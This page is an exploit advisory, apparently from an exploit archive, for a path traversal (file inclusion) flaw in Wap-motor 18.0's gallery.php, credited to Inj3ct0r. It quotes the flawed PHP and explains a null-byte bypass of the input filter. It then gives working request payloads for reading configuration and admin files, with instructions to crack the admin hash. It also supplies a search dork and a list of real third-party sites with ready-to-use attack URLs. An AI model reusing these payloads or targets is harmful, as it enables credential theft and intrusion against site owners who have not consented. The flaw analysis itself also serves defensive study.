Wap-motor <= v. 18.0 (gallery.php) File Inclusion Vulnerability

2009.09.11
Credit: Inj3ct0r
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

=============================================================== Wap-motor <= v. 18.0 (gallery.php) File Inclusion Vulnerability =============================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Product : Wap-motor Vesrion : v 18.0 dork: "Powered by Wap-motor" site: http://visavi.net download: http://visavi.net/download/down.php?action=ob&did=wap-motor16&fid=MOTOR18.zip& In this version of vulnerability photo gallery script. Namely file http://[PATH]/gallery/gallery.php Let's code! PHP code: <?php require_once"../template/start.php"; require_once"../template/regglobals.php"; require_once"../template/config.php"; require_once"../template/functions.php"; $image=check($image); $ext = strtolower(substr($image, strrpos($image, '.') + 1)); if($ext=="jpg" || $ext=="gif" || $ext=="png"){ if($ext=="jpg"){$ext="jpeg";} $filename = BASEDIR."local/datagallery/$image"; $filename = file_get_contents($filename); header('Content-Disposition: inline; filename="'.$image.'"'); header("Content-type: image/$ext"); header("Content-Length: ".strlen($filename)); echo $filename; } ?> file : ./template/regglobals.php ... if (!ini_get('register_globals')) { while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_SESSION)) $GLOBALS[$key]=$value; } ... foreach ($_GET as $check_url) { if ((eregi("<[^>]*script*\"?[^>]*>", $check_url)) || (eregi("<[^>]*object*\"?[^>]*>", $check_url)) || (eregi("<[^>]*iframe*\"?[^>]*>", $check_url)) || (eregi("<[^>]*applet*\"?[^>]*>", $check_url)) || (eregi("<[^>]*meta*\"?[^>]*>", $check_url)) || (eregi("<[^>]*style*\"?[^>]*>", $check_url)) || (eregi("<[^>]*form*\"?[^>]*>", $check_url)) || (eregi("\([^>]*\"?[^)]*\)", $check_url)) || (eregi("\"", $check_url)) || (eregi("\'", $check_url)) || (eregi("\./", $check_url)) || (eregi("//", $check_url)) || (eregi("<", $check_url)) || (eregi(">", $check_url))) { header ("Location: ".BASEDIR."index.php?isset=403&".SID); exit; } ... Here, the picture has become clearer to see the algorithm! Algorithm for action script when processing $ _GET [ 'image']: 1. while (list ($ key, $ value) = each ($ _GET)) $ GLOBALS [$ key] = $ value; 2. foreach ($ _GET as $ check_url) ... 3. $ ext = strtolower (substr ($ image, strrpos ($ image, '.') + 1)); 4. header ( 'Content-Disposition: inline; filename ="'.$ image .'"'); header ( "Content-type: image / $ ext"); header ( "Content-Length:". strlen ($ filename)); echo $ filename; That's what we have: http://[PATH]/gallery/gallery.php?image=%00../profil/Twost.prof%00.gif Consider, image =% 00 - so we Nulle-byte stop processing eregi (). (Thanks for the article Elekt'u fatal mistake Php. Part Two.) .. / profil / Twost.prof% 00 - inkludim profile file (do not forget to change the admin username to Twost) and trims the same Nulle-byte extension . gif - but it substitute for the true value goes here header ( "Content-type: image / $ ext"); The picture we have of course not appear, but it is not empty! Open the text editor and see the base of the account admin, you only have to decipher the hash! That's it! Example: http://mobile-world.dbhost.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://margarita.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://sat-tv.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://kod.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://fuckyou.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://bazooka.pp.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://metra.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://chermo.net.ru/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif http://sefan.us/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif http://landark.net.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif http://vseicq.org.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]

Referencje:

http://xforce.iss.net/xforce/xfdb/52810
http://secunia.com/advisories/36416
http://packetstormsecurity.org/0908-exploits/wapmotor-lfi.txt
http://osvdb.org/57426


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top